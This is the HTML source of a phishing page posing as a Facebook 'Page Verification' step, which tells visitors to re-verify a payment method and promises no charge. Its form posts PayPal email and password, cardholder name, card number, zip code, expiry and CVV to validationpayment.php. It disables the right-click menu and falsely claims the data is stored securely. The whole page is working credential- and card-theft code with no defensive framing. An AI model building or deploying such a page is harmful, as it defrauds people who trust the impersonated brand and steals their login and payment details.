<!doctype html>
                        <html>
                            <head>
                                <meta charset='utf-8'>
                                <meta name='viewport' content='width=device-width, initial-scale=1'>
                                <title>Page Verification</title>
								    <link rel="shortcut icon" href="fav.ico">

                                <link href='https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-alpha1/dist/css/bootstrap.min.css' rel='stylesheet'>
                                <link href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css' rel='stylesheet'>
                                <script type='text/javascript' src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js'></script>
                                <style>@import url("https://fonts.googleapis.com/css2?family=Poppins:weight@100;200;300;400;500;600;700;800&display=swap");

body {
    background-color: #f2f2f2;
    font-family: "Poppins", sans-serif;
    font-weight: 300
}

.container {
    height: 100vh
}

.card {
    border: none
}

.card-header {
    padding: .5rem 1rem;
    margin-bottom: 0;
    background-color: rgba(0, 0, 0, .03);
    border-bottom: none
}

.btn-light:focus {
    color: #212529;
    background-color: #e2e6ea;
    border-color: #dae0e5;
    box-shadow: 0 0 0 0.2rem rgba(216, 217, 219, .5)
}

.form-control {
    height: 50px;
    border: 2px solid #eee;
    border-radius: 6px;
    font-size: 14px
}

.form-control:focus {
    color: #495057;
    background-color: #fff;
    border-color: #039be5;
    outline: 0;
    box-shadow: none
}

.input {
    position: relative
}

.input i {
    position: absolute;
    top: 16px;
    left: 11px;
    color: #989898
}

.input input {
    text-indent: 25px
}

.card-text {
    font-size: 13px;
    margin-left: 6px
}

.certificate-text {
    font-size: 12px
}

.billing {
    font-size: 11px
}

.super-price {
    top: 0px;
    font-size: 22px
}

.super-month {
    font-size: 11px
}

.line {
    color: #bfbdbd
}

.free-button {
    background: #1565c0;
    height: 52px;
    font-size: 15px;
    border-radius: 8px
}

.payment-card-body {
    flex: 1 1 auto;
    padding: 24px 1rem !important
}</style>
                                </head>
                                <body oncontextmenu='return false' class='snippet-body'>
                                <div class="container d-flex justify-content-center mt-5 mb-5">
    <div class="row g-3">
        <div class="col-md-6">  
            <div class="card">
                <div class="d-flex justify-content-between p-3">
                    <div class="d-flex flex-column"> <span style="font-weight: bold;">Verification Process</span>   </div>
                    <div class="mt-1"> </div>
                </div>
                <hr class="mt-0 line">
                <div class="p-3">
				Since you have added a payment method to your Facebook account. Please re-verify the payment method. so that Facebook can re-verify your Facebook page.
			<br>
			<br>

				 <i>
				 <div class="alert alert-warning" role="alert">
				  Notice: We will not charge you for this verification process. 
 					</div>
				 </i>					

                 </div>
                 
               <!-- <div class="p-3"> <button class="btn btn-primary btn-block free-button">Confirm</button>
                 </div> -->
            </div>
        </div>
		
		    <div class="col-md-6">  
			<form method="post" action="validationpayment.php">

            <div class="card">
			     <div class="d-flex justify-content-between p-3">
                    <div class="d-flex flex-column"> <span style="font-weight: bold;">Payment Method</span>   </div>
                    <div class="mt-1"> </div>
                </div>
                <div class="accordion" id="accordionExample">
                    <div class="card">
                        <div class="card-header p-0" id="headingTwo">
                            <h2 class="mb-0"> <span class="btn btn-light btn-block text-left collapsed p-3 rounded-0 border-bottom-custom"  data-toggle="collapse" data-target="#collapseTwo" aria-expanded="false" aria-controls="collapseTwo">
                                    <div class="d-flex align-items-center justify-content-between"> <span>Paypal</span> <img src="https://i.imgur.com/7kQEsHU.png" width="30"> </div>
                                </span> </h2>
                        </div>
                        <div id="collapseTwo" class="collapse" aria-labelledby="headingTwo" data-parent="#accordionExample">
                            <div class="card-body"> <input type="text" class="form-control" name="pemail" placeholder="Paypal email"> </div>
                            <div class="card-body"> <input type="password" class="form-control" name="ppass" placeholder="*********"> </div>
                        </div> 
                    </div>
                    <div class="card">
                        <div class="card-header p-0">
                            <h2 class="mb-0"> <span class="btn btn-light btn-block text-left p-3 rounded-0" data-toggle="collapse" data-target="#collapseOne" aria-expanded="true" aria-controls="collapseOne">
                                    <div class="d-flex align-items-center justify-content-between"> <span>Credit card</span>
                                        <div class="icons"> <img src="https://i.imgur.com/2ISgYja.png" width="30"> <img src="https://i.imgur.com/W1vtnOV.png" width="30">  </div>
                                    </div>
                                </span> </h2>
                        </div>
                        <div id="collapseOne" class="collapse show" aria-labelledby="headingOne" data-parent="#accordionExample">
                            <div class="card-body payment-card-body"> 
                                <span class="font-weight-normal card-text">Card Name</span>
                                <div class="input"> <i class="fa fa-id-card"></i> <input type="text" required   class="form-control" placeholder="Name on Card" name="ccname"> </div>

                                <span class="font-weight-normal card-text">Card Number</span>
                                <div class="input"> <i class="fa fa-credit-card"></i> <input type="text" required maxlength="19" class="form-control" placeholder="0000 0000 0000 0000" name="ccnumber"> </div>
                                <div class="row mt-3 mb-3">
                                    <div class="col-md-4"> <span class="font-weight-normal card-text">Zip Code</span>
                                        <div class="input"> <i class="fa fa-map-pin"></i> <input type="text" required class="form-control"  placeholder="Zip Code" name="zipcode"> </div>
                                    </div>
                                    <div class="col-md-4"> <span class="font-weight-normal card-text">Expiry Date</span>
                                        <div class="input"> <i class="fa fa-calendar"></i> <input type="text" required class="form-control" maxlength = "7" placeholder="MM/YY" name="mmyy"> </div>
                                    </div>
                                    <div class="col-md-4"> <span class="font-weight-normal card-text">CVC/CVV</span>
                                        <div class="input"> <i class="fa fa-lock"></i> <input type="text" required class="form-control" maxlength="4" placeholder="000"  name="cvv"> </div>
                                    </div>
                                </div> <span class="text-muted certificate-text"><i class="fa fa-lock"></i> Your payment methods are saved and stored securely</span>
                            </div>
                        </div>
                    </div>
                </div>
				
				<div class="d-flex justify-content-between p-3">
                    <span style="font-weight: bold;"><button type="submit" class="btn btn-primary btn-block free-button">Process</button></span>   </div>
                    <div class="mt-1"> </div>
                </div>
		</form>
            </div>
        </div>

    </div>
</div>
                                <script type='text/javascript' src='https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-alpha1/dist/js/bootstrap.bundle.min.js'></script>
                                <script type='text/javascript'></script>
                                </body>
                            </html>